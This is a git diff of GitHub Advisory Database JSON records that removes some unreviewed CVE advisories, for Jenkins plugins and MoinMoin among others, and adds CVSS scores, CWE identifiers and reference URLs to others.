a/advisories/unreviewed/2022/05/GHSA-gw8g-hh47-q4gw/GHSA-gw8g-hh47-q4gw.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-gw8g-hh47-q4gw", - "modified": "2022-05-14T03:45:23Z", - "published": "2022-05-14T03:45:23Z", - "aliases": [ - "CVE-2017-1000389" - ], - "details": "Some URLs provided by Jenkins global-build-stats plugin version 1.4 and earlier returned a JSON response that contained request parameters. These responses had the Content Type: text/html, so could have been interpreted as HTML by clients, resulting in a potential reflected cross-site scripting vulnerability. Additionally, some URLs provided by global-build-stats plugin that modify data did not require POST requests to be sent, resulting in a potential cross-site request forgery vulnerability.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000389" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2017-10-23/" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-01-26T02:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-gwxm-wqpq-w539/GHSA-gwxm-wqpq-w539.json b/advisories/unreviewed/2022/05/GHSA-gwxm-wqpq-w539/GHSA-gwxm-wqpq-w539.json deleted file mode 100644 index 2430300a024c7..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-gwxm-wqpq-w539/GHSA-gwxm-wqpq-w539.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-gwxm-wqpq-w539", - "modified": "2022-05-14T03:18:40Z", - "published": "2022-05-14T03:18:39Z", - "aliases": [ - "CVE-2018-1000176" - ], - "details": "An exposure of sensitive information vulnerability exists in Jenkins Email Extension Plugin 2.61 and older in src/main/resources/hudson/plugins/emailext/ExtendedEmailPublisher/global.groovy and ExtendedEmailPublisherDescriptor.java that allows attackers with control of a Jenkins administrator's web browser (e.g. malicious extension) to retrieve the configured SMTP password.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000176" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-04-16/" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-200" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-05-08T15:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-gxh5-r8gp-pjc3/GHSA-gxh5-r8gp-pjc3.json b/advisories/unreviewed/2022/05/GHSA-gxh5-r8gp-pjc3/GHSA-gxh5-r8gp-pjc3.json deleted file mode 100644 index 7bf80785c4214..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-gxh5-r8gp-pjc3/GHSA-gxh5-r8gp-pjc3.json +++ /dev/null @@ -1,83 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-gxh5-r8gp-pjc3", - "modified": "2022-05-17T05:49:23Z", - "published": "2022-05-17T05:49:23Z", - "aliases": [ - "CVE-2010-2970" - ], - "details": "Multiple cross-site scripting (XSS) vulnerabilities in MoinMoin 1.9.x before 1.9.3 allow remote attackers to inject arbitrary web script or HTML via crafted content, related to (1) action/SlideShow.py, (2) action/anywikidraw.py, and (3) action/language_setup.py, a similar issue to CVE-2010-2487.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-2970" - }, - { - "type": "WEB", - "url": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=584809" - }, - { - "type": "WEB", - "url": "http://hg.moinmo.in/moin/1.9/raw-file/1.9.3/docs/CHANGES" - }, - { - "type": "WEB", - "url": "http://hg.moinmo.in/moin/1.9/rev/4fe9951788cb" - }, - { - "type": "WEB", - "url": "http://hg.moinmo.in/moin/1.9/rev/e50b087c4572" - }, - { - "type": "WEB", - "url": "http://marc.info/?l=oss-security&m=127799369406968&w=2" - }, - { - "type": "WEB", - "url": "http://marc.info/?l=oss-security&m=127809682420259&w=2" - }, - { - "type": "WEB", - "url": "http://moinmo.in/MoinMoinBugs/1.9.2UnescapedInputForThemeAddMsg" - }, - { - "type": "WEB", - "url": "http://moinmo.in/MoinMoinRelease1.9" - }, - { - "type": "WEB", - "url": "http://moinmo.in/SecurityFixes" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/40836" - }, - { - "type": "WEB", - "url": "http://www.debian.org/security/2010/dsa-2083" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/40549" - }, - { - "type": "WEB", - "url": "http://www.vupen.com/english/advisories/2010/1981" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2010-08-05T13:22:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-gxmr-w5mj-v8hh/GHSA-gxmr-w5mj-v8hh.json b/advisories/unreviewed/2022/05/GHSA-gxmr-w5mj-v8hh/GHSA-gxmr-w5mj-v8hh.json index 0dc65dceaebbf..086129844332d 100644 --- a/advisories/unreviewed/2022/05/GHSA-gxmr-w5mj-v8hh/GHSA-gxmr-w5mj-v8hh.json +++ b/advisories/unreviewed/2022/05/GHSA-gxmr-w5mj-v8hh/GHSA-gxmr-w5mj-v8hh.json @@ -105,34 +105,78 @@ "type": "WEB", "url": "https://kubernetes.io/blog/2019/02/11/runc-and-cve-2019-5736/" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/24e54e3c6b2259e3903b6b8fe26896ac649c481ea99c5739468c92a3%40%3Cdev.dlab.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/24e54e3c6b2259e3903b6b8fe26896ac649c481ea99c5739468c92a3@%3Cdev.dlab.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/a258757af84c5074dc7bf932622020fd4f60cef65a84290380386706%40%3Cuser.mesos.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a258757af84c5074dc7bf932622020fd4f60cef65a84290380386706@%3Cuser.mesos.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/a585f64d14c31ab393b90c5f17e41d9765a1a17eec63856ce750af46%40%3Cdev.dlab.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a585f64d14c31ab393b90c5f17e41d9765a1a17eec63856ce750af46@%3Cdev.dlab.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/acacf018c12636e41667e94ac0a1e9244e887eef2debdd474640aa6e%40%3Cdev.dlab.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/acacf018c12636e41667e94ac0a1e9244e887eef2debdd474640aa6e@%3Cdev.dlab.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/b162dd624dc088cd634292f0402282a1d1d0ce853baeae8205bc033c%40%3Cdev.mesos.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b162dd624dc088cd634292f0402282a1d1d0ce853baeae8205bc033c@%3Cdev.mesos.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/rc494623986d76593873ce5a40dd69cb3629400d10750d5d7e96b8587%40%3Cdev.dlab.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc494623986d76593873ce5a40dd69cb3629400d10750d5d7e96b8587@%3Cdev.dlab.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DLC52IOJN6IQJWJ6CUI6AIUP6GVVG2QP/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EGZKRCKI3Y7FMADO2MENMT4TU24QGHFR/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SWFJGIPYAAAMVSWWI3QWYXGA3ZBU2H4W/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/V6A4OSFM5GGOWW4ECELV5OHX2XRAUSPH/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLC52IOJN6IQJWJ6CUI6AIUP6GVVG2QP/" @@ -269,6 +313,18 @@ "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2019/10/29/3" }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/01/31/6" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/02/01/1" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/02/02/3" + }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/106976" diff --git a/advisories/unreviewed/2022/05/GHSA-h3r9-mx35-pp5w/GHSA-h3r9-mx35-pp5w.json b/advisories/unreviewed/2022/05/GHSA-h3r9-mx35-pp5w/GHSA-h3r9-mx35-pp5w.json index 7fe545accde86..99bafa5dae519 100644 --- a/advisories/unreviewed/2022/05/GHSA-h3r9-mx35-pp5w/GHSA-h3r9-mx35-pp5w.json +++ b/advisories/unreviewed/2022/05/GHSA-h3r9-mx35-pp5w/GHSA-h3r9-mx35-pp5w.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-h3r9-mx35-pp5w", - "modified": "2022-05-01T01:52:44Z", + "modified": "2024-02-08T21:30:30Z", "published": "2022-05-01T01:52:44Z", "aliases": [ "CVE-2005-0877" ], "details": "Dnsmasq before 2.21 allows remote attackers to poison the DNS cache via answers to queries that were not made by Dnsmasq.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } ], "affected": [ @@ -37,7 +40,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-346" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-h5hm-73hg-frrm/GHSA-h5hm-73hg-frrm.json b/advisories/unreviewed/2022/05/GHSA-h5hm-73hg-frrm/GHSA-h5hm-73hg-frrm.json deleted file mode 100644 index 3d8025b65d28b..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-h5hm-73hg-frrm/GHSA-h5hm-73hg-frrm.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-h5hm-73hg-frrm", - "modified": "2022-05-14T02:56:39Z", - "published": "2022-05-14T02:56:39Z", - "aliases": [ - "CVE-2018-1999034" - ], - "details": "A man in the middle vulnerability exists in Jenkins Inedo ProGet Plugin 0.8 and earlier in ProGetApi.java, ProGetConfig.java, ProGetConfiguration.java that allows attackers to impersonate any service that Jenkins connects to.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1999034" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-07-30/#SECURITY-933" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-295" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-08-01T13:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-h699-2469-3vhg/GHSA-h699-2469-3vhg.json b/advisories/unreviewed/2022/05/GHSA-h699-2469-3vhg/GHSA-h699-2469-3vhg.json index 4c428124ef98d..5723363a4cdef 100644 --- a/advisories/unreviewed/2022/05/GHSA-h699-2469-3vhg/GHSA-h699-2469-3vhg.json +++ b/advisories/unreviewed/2022/05/GHSA-h699-2469-3vhg/GHSA-h699-2469-3vhg.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-h699-2469-3vhg", - "modified": "2022-05-24T19:09:03Z", + "modified": "2024-01-30T00:30:28Z", "published": "2022-05-24T19:09:03Z", "aliases": [ "CVE-2021-3169" ], "details": "An issue in Jumpserver 2.6.2 and below allows attackers to create a connection token through an API which does not have access control and use it to access sensitive assets.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ diff --git a/advisories/unreviewed/2022/05/GHSA-h7hj-mf8m-2h22/GHSA-h7hj-mf8m-2h22.json b/advisories/unreviewed/2022/05/GHSA-h7hj-mf8m-2h22/GHSA-h7hj-mf8m-2h22.json index b5327836785ba..89819f2537722 100644 --- a/advisories/unreviewed/2022/05/GHSA-h7hj-mf8m-2h22/GHSA-h7hj-mf8m-2h22.json +++ b/advisories/unreviewed/2022/05/GHSA-h7hj-mf8m-2h22/GHSA-h7hj-mf8m-2h22.json @@ -38,6 +38,14 @@ "type": "WEB", "url": "http://www.eset.com/joomla/index.php?option=com_content&task=view&id=3469&Itemid=26" }, + { + "type": "WEB", + "url": "http://www.nruns.com/%5Bn.runs-SA-2007.016%5D%20-%20NOD32%20Antivirus%20CAB%20parsing%20Arbitrary%20Code%20Execution%20Advisory.pdf" + }, + { + "type": "WEB", + "url": "http://www.nruns.com/%5Bn.runs-SA-2007.016%5D%20-%20NOD32%20Antivirus%20CAB%20parsing%20Arbitrary%20Code%20Execution%20Advisory.txt" + }, { "type": "WEB", "url": "http://www.nruns.com/[n.runs-SA-2007.016]%20-%20NOD32%20Antivirus%20CAB%20parsing%20Arbitrary%20Code%20Execution%20Advisory.pdf" @@ -61,7 +69,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-362" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-h7rx-r733-7x7r/GHSA-h7rx-r733-7x7r.json b/advisories/unreviewed/2022/05/GHSA-h7rx-r733-7x7r/GHSA-h7rx-r733-7x7r.json deleted file mode 100644 index f4bd727d926f0..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-h7rx-r733-7x7r/GHSA-h7rx-r733-7x7r.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-h7rx-r733-7x7r", - "modified": "2022-05-13T01:40:57Z", - "published": "2022-05-13T01:40:57Z", - "aliases": [ - "CVE-2017-1000107" - ], - "details": "Script Security Plugin did not apply sandboxing restrictions to constructor invocations via positional arguments list, super constructor invocations, method references, and type coercion expressions. This could be used to invoke arbitrary constructors and methods, bypassing sandbox protection.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000107" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2017-08-07/" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2017-10-05T01:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-hf4p-4j9r-3cvx/GHSA-hf4p-4j9r-3cvx.json b/advisories/unreviewed/2022/05/GHSA-hf4p-4j9r-3cvx/GHSA-hf4p-4j9r-3cvx.json deleted file mode 100644 index 51a2899e58140..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-hf4p-4j9r-3cvx/GHSA-hf4p-4j9r-3cvx.json +++ /dev/null @@ -1,43 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-hf4p-4j9r-3cvx", - "modified": "2022-05-24T22:00:36Z", - "published": "2022-05-24T22:00:36Z", - "aliases": [ - "CVE-2019-16355" - ], - "summary": "Incorrect Default Permissions in Beego", - "details": "The File Session Manager in Beego 1.10.0 allows local users to read session files because of weak permissions for individual files.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16355" - }, - { - "type": "WEB", - "url": "https://github.com/beego/beego/issues/3763" - }, - { - "type": "WEB", - "url": "https://github.com/beego/beego/pull/3975/commits/f99cbe0fa40936f2f8dd28e70620c559b6e5e2fd" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-276" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-09-16T15:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-hfr6-pxvf-frf7/GHSA-hfr6-pxvf-frf7.json b/advisories/unreviewed/2022/05/GHSA-hfr6-pxvf-frf7/GHSA-hfr6-pxvf-frf7.json index 09f313081dcc3..c20a339a26fce 100644 --- a/advisories/unreviewed/2022/05/GHSA-hfr6-pxvf-frf7/GHSA-hfr6-pxvf-frf7.json +++ b/advisories/unreviewed/2022/05/GHSA-hfr6-pxvf-frf7/GHSA-hfr6-pxvf-frf7.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-hfr6-pxvf-frf7", - "modified": "2022-05-02T03:30:19Z", + "modified": "2024-02-02T15:30:27Z", "published": "2022-05-02T03:30:19Z", "aliases": [ "CVE-2009-1955" ], "details": "The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document containing a large number of nested entity references, as demonstrated by a PROPFIND request, a similar issue to CVE-2003-1564.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -18,58 +21,114 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-1955" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/8d63cb8e9100f28a99429b4328e4e7cebce861d5772ac9863ba2ae6f%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/8d63cb8e9100f28a99429b4328e4e7cebce861d5772ac9863ba2ae6f@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/f7f95ac1cd9895db2714fa3ebaa0b94d0c6df360f742a40951384a53%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f7f95ac1cd9895db2714fa3ebaa0b94d0c6df360f742a40951384a53@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r2295080a257bad27ea68ca0af12fc715577f9e84801eae116a33107e%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2295080a257bad27ea68ca0af12fc715577f9e84801eae116a33107e@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r476d175be0aaf4a17680ef98c5153b4d336eaef76fb2224cc94c463a%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r476d175be0aaf4a17680ef98c5153b4d336eaef76fb2224cc94c463a@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r57608dc51b79102f3952ae06f54d5277b649c86d6533dcd6a7d201f7%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r57608dc51b79102f3952ae06f54d5277b649c86d6533dcd6a7d201f7@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r75cbe9ea3e2114e4271bbeca7aff96117b50c1b6eb7c4772b0337c1f%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r75cbe9ea3e2114e4271bbeca7aff96117b50c1b6eb7c4772b0337c1f@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r9ea3538f229874c80a10af473856a81fbf5f694cd7f471cc679ba70b%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9ea3538f229874c80a10af473856a81fbf5f694cd7f471cc679ba70b@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r9f93cf6dde308d42a9c807784e8102600d0397f5f834890708bf6920%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9f93cf6dde308d42a9c807784e8102600d0397f5f834890708bf6920@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/rad01d817195e6cc871cb1d73b207ca326379a20a6e7f30febaf56d24%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rad01d817195e6cc871cb1d73b207ca326379a20a6e7f30febaf56d24@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/rc4c53a0d57b2771ecd4b965010580db355e38137c8711311ee1073a8%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc4c53a0d57b2771ecd4b965010580db355e38137c8711311ee1073a8@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/rdca61ae990660bacb682295f2a09d34612b7bb5f457577fe17f4d064%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdca61ae990660bacb682295f2a09d34612b7bb5f457577fe17f4d064@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/reb7c64aeea604bf948467d9d1cab8ff23fa7d002be1964bcc275aae7%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/reb7c64aeea604bf948467d9d1cab8ff23fa7d002be1964bcc275aae7@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/rf6449464fd8b7437704c55f88361b66f12d5b5f90bcce66af4be4ba9%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf6449464fd8b7437704c55f88361b66f12d5b5f90bcce66af4be4ba9@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/rfbaf647d52c1cb843e726a0933f156366a806cead84fbd430951591b%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfbaf647d52c1cb843e726a0933f156366a806cead84fbd430951591b@%3Ccvs.httpd.apache.org%3E" @@ -261,7 +320,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-776" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-hg77-2mmh-2xqw/GHSA-hg77-2mmh-2xqw.json b/advisories/unreviewed/2022/05/GHSA-hg77-2mmh-2xqw/GHSA-hg77-2mmh-2xqw.json index b37e597e5af17..b1d83f246abcc 100644 --- a/advisories/unreviewed/2022/05/GHSA-hg77-2mmh-2xqw/GHSA-hg77-2mmh-2xqw.json +++ b/advisories/unreviewed/2022/05/GHSA-hg77-2mmh-2xqw/GHSA-hg77-2mmh-2xqw.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-hg77-2mmh-2xqw", - "modified": "2022-05-02T03:45:58Z", + "modified": "2024-02-08T21:30:31Z", "published": "2022-05-02T03:45:58Z", "aliases": [ "CVE-2009-3520" ], "details": "Cross-site request forgery (CSRF) vulnerability in the Your_account module in CMSphp 0.21 allows remote attackers to hijack the authentication of administrators for requests that change an administrator password via the pseudo, pwd, and uid parameters in an admin_info_user_verif action.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ diff --git a/advisories/unreviewed/2022/05/GHSA-hrr3-7r5v-vxx5/GHSA-hrr3-7r5v-vxx5.json b/advisories/unreviewed/2022/05/GHSA-hrr3-7r5v-vxx5/GHSA-hrr3-7r5v-vxx5.json deleted file mode 100644 index 7529cd60769d6..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-hrr3-7r5v-vxx5/GHSA-hrr3-7r5v-vxx5.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-hrr3-7r5v-vxx5", - "modified": "2022-05-14T02:56:40Z", - "published": "2022-05-14T02:56:40Z", - "aliases": [ - "CVE-2018-1999035" - ], - "details": "A man in the middle vulnerability exists in Jenkins Inedo BuildMaster Plugin 1.3 and earlier in BuildMasterConfiguration.java, BuildMasterConfig.java, BuildMasterApi.java that allows attackers to impersonate any service that Jenkins connects to.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1999035" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-07-30/#SECURITY-935" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-295" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-08-01T13:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-hw83-jpxr-g225/GHSA-hw83-jpxr-g225.json b/advisories/unreviewed/2022/05/GHSA-hw83-jpxr-g225/GHSA-hw83-jpxr-g225.json deleted file mode 100644 index 8ab4c1e748b88..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-hw83-jpxr-g225/GHSA-hw83-jpxr-g225.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-hw83-jpxr-g225", - "modified": "2022-05-13T01:31:34Z", - "published": "2022-05-13T01:31:34Z", - "aliases": [ - "CVE-2019-1003022" - ], - "details": "A denial of service vulnerability exists in Jenkins Monitoring Plugin 1.74.0 and earlier in PluginImpl.java that allows attackers to kill threads running on the Jenkins master.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003022" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-01-28/#SECURITY-1153" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-352" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-02-06T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-j2h6-j34w-g5vp/GHSA-j2h6-j34w-g5vp.json b/advisories/unreviewed/2022/05/GHSA-j2h6-j34w-g5vp/GHSA-j2h6-j34w-g5vp.json deleted file mode 100644 index 69477e467407f..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-j2h6-j34w-g5vp/GHSA-j2h6-j34w-g5vp.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-j2h6-j34w-g5vp", - "modified": "2022-05-14T03:45:49Z", - "published": "2022-05-14T03:45:49Z", - "aliases": [ - "CVE-2018-1000013" - ], - "details": "Jenkins Release Plugin 2.9 and earlier did not require form submissions to be submitted via POST, resulting in a CSRF vulnerability allowing attackers to trigger release builds.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000013" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-01-22/" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/102834" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-352" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-01-23T14:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-j2rp-vprg-5m9q/GHSA-j2rp-vprg-5m9q.json 